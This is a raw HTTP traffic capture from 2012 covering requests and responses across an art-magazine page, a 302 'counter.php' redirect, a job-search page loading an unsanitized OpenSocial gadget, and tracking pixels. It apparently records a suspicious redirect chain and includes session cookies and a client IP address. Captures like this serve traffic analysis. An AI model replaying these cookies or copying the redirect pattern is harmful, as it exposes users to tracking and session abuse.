Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache
Last-Modified: Sun, 09 Nov 2008 21:50:16 GMT
Etag: &quot;cc7b3e-39b3-45b48a1baf600&quot;
Accept-Ranges: bytes
Content-Length: 14771
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/10b.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=393
Connection: Keep-Alive
GET /csi?v=3&s=opensocial-gadgets&action=open_home&gadget=http%253A%252F%252Fnuzs.com%252Fpromotion.xml&container=open&view=home&e=&rt=dl.134,ol.1921,prt.1921 HTTP/1.1

Host: csi.gstatic.com
GET /csi?v=3&amp;s=opensocial-gadgets&amp;action=open_home&amp;gadget=http%253A%252F%252Fnuzs.com%252Fpromotion.xml&amp;container=open&amp;view=home&amp;e=&amp;rt=dl.134,ol.1921,prt.1921 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&amp;container=open&amp;view=home&amp;lang=all&amp;country=ALL&amp;debug=0&amp;nocache=0&amp;sanitize=0&amp;v=232824d3a7ae247c&amp;source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;libs=core%3Acore.io
HTTP/1.1 204 No Content

Content-Type: image/gif
Content-Length: 0
Date: Wed, 21 Jan 2004 19:51:30 GMT
Pragma: no-cache
Cache-Control: private, no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Server: Golfe
GET /jobsearchtools.html/186/images/nav_back.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=392
Connection: Keep-Alive
GET /jobsearchtools.html/186//images/cn_back02.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=392
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/spacer.gif HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=392
Connection: Keep-Alive
GET /jobsearchtools.html/186//images/cn_back.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=392
Connection: Keep-Alive
GET /jobsearchtools.html/186//images/spacer.gif HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:19 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=391
Connection: Keep-Alive
GET /a/jbb/find-jobs-json/jbb_widget_jobposts/3 HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D1%26lst%3D509a8a7d; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; expires=Fri, 07-Dec-2012 16:21:20 GMT; path=/ sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1; expires=Wed, 07-Nov-2012 16:51:20 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Encoding: gzip
GET /b?c1=2&c2=6034750&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1 HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=2&amp;c2=6034750&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: UID=2d6a37e-195.159.219.8-1352305274; UIDR=1352305274
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 07 Nov 2012 16:21:20 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-32oLU8PZtWAwo.gif HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Set-Cookie: mc=509a8a80-d278a-aa140-f3599; expires=Fri, 09-May-2014 16:21:20 GMT; path=/; domain=.quantserve.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV&quot;
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Wed, 07 Nov 2012 16:21:20 GMT
Server: QS
GET /c/jbb/images/jbb-widget-vertical-gel/blue/recent-jobs.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 3487
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /a/jbb/promote_widget_vertical_gel_css/blue HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1; expires=Wed, 07-Nov-2012 16:51:20 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Encoding: gzip
GET /c/jbb/images/jbb-widget-vertical-gel/blue/bg.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://betterjobs.jobamatic.com/a/jbb/promote_widget_vertical_gel_css/blue
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 653
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /c/jbb/images/jbb-widget-vertical-gel/blue/bottom-bg.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://betterjobs.jobamatic.com/a/jbb/promote_widget_vertical_gel_css/blue
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 94
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /c/jbb/images/jbb-widget-vertical-gel/blue/top-left.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://betterjobs.jobamatic.com/a/jbb/promote_widget_vertical_gel_css/blue
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 312
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /c/jbb/images/jbb-widget-vertical-gel/blue/bottom-left.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://betterjobs.jobamatic.com/a/jbb/promote_widget_vertical_gel_css/blue
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 205
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /c/jbb/images/jbb-widget-vertical-gel/blue/bottom-right.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://betterjobs.jobamatic.com/a/jbb/promote_widget_vertical_gel_css/blue
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 206
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /c/jbb/images/jbb-widget-vertical-gel/blue/top-right.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://betterjobs.jobamatic.com/a/jbb/promote_widget_vertical_gel_css/blue
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 312
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /c/jbb/images/jbb-widget-vertical-gel/blue/top-bg.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://betterjobs.jobamatic.com/a/jbb/promote_widget_vertical_gel_css/blue
Cookie: gc=1; shup=fvt%3D509a8a7c%26ncs%3D2%26lst%3D509a8a80; sh_uid=id%3A2098022034509a8a7cc9c5d2.39711230; sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:20 GMT
Content-Length: 94
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /2010/04/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307970; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
X-Pingback: http://artworksmagazine.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 07 Nov 2012 16:21:14 GMT
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /counter.php HTTP/1.1

Host: resumebackup.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Location: /counter.php